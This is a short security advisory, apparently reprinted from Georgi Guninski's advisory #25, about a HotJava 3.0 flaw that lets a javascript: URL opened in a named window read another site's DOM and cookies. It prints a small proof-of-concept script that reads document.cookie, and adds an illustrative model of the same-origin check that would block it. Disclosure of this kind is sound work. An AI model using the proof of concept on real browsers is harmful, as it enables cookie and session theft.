Vulnerability
javascript
Affected
HotJava 3.0
Description
The following is based on Georgi Guninski security advisory #25.
There is a security vulnerability in HotJava Browser 3.0 which
allows accessing the DOM of arbitrary URLs after viewing a web
page. This allows stealing of cookies.
The problem is opening a javascript: URL in a named window, which
allows accessing the DOM of the document in the named window.
The code is:
<SCRIPT>
window.open("http://www.sun.com","g");
setTimeout("window.open('javascript:alert(\"The first link is: \"+document.links[0].href);alert(\"The cookie is: \"+document.cookie)','g')",10000);
</SCRIPT>
Demonstration is available at:
http://www.guninski.com/hotjava-1.html
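The same-origin rule that this behaviour violates, modelled as an added example (not code from the advisory or from Sun): a javascript: URL aimed at an existing named window may run only if the caller's origin matches that of the document already loaded there. The function names and the attacker.example host are assumptions made for illustration.

```javascript
// Hypothetical model of the check a browser applies when a page calls
// window.open(navUrl, name) and a window with that name already exists.

// Returns the (scheme, host, port) origin for http/https URLs, else null.
function originOf(url) {
  const u = new URL(url);
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  return u.origin;
}

// callerUrl:    page that issues the window.open() call
// targetDocUrl: document currently loaded in the named window
// navUrl:       URL passed to window.open()
function decideNavigation(callerUrl, targetDocUrl, navUrl) {
  let scheme;
  try {
    // Resolving against the caller normalises scheme case and leading
    // whitespace, so "JavaScript:" and " javascript:" are both recognised.
    scheme = new URL(navUrl, callerUrl).protocol;
  } catch {
    return "block"; // unparseable input is never executed
  }
  // Ordinary URLs replace the document; no script runs in the old one.
  if (scheme !== "javascript:") return "navigate";

  // A javascript: URL executes inside the target document, so it is
  // allowed only when both documents share an origin. Targets without a
  // comparable origin are refused (a conservative simplification).
  const caller = originOf(callerUrl);
  const target = originOf(targetDocUrl);
  return caller !== null && caller === target ? "run-script" : "block";
}

// Constructed sample: the situation described in the advisory.
console.log(decideNavigation(
  "http://attacker.example/page.html", // assumed hostile page
  "http://www.sun.com/",               // document loaded in window "g"
  "javascript:alert(document.cookie)"
));
```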
Solution
Disable JavaScript. Sun's current plan is that the HotJava
Browser may not be included in a future Solaris release. However,
this plan is subject to change at Sun's sole discretion.
According to Sun's documents on the subject of Solaris 8, the
HotJava(TM) browser is no longer supported.